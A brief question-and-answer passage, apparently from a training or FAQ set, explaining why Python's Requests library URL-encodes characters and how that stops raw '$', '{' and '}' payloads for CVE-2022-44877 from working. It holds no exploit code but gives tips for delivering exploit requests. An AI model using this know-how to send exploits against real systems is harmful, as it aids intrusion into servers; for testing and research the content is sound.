Why does the Python Requests library encode URLs by default, and how does this cause issues when testing exploits like CVE-2022-44877?

The Requests library automatically encodes URLs using the `requote_uri` function to ensure they are properly formatted according to RFC standards. However, when testing exploits such as CVE-2022-44877, the payload requires raw, unencoded characters like `$`, `{`, and `}` to trigger the vulnerability. If the URL is encoded (e.g., `%7B` for `{`), the exploit will fail. This is detailed in Python Development Tips - Disabling URL Encoding in the Requests Library.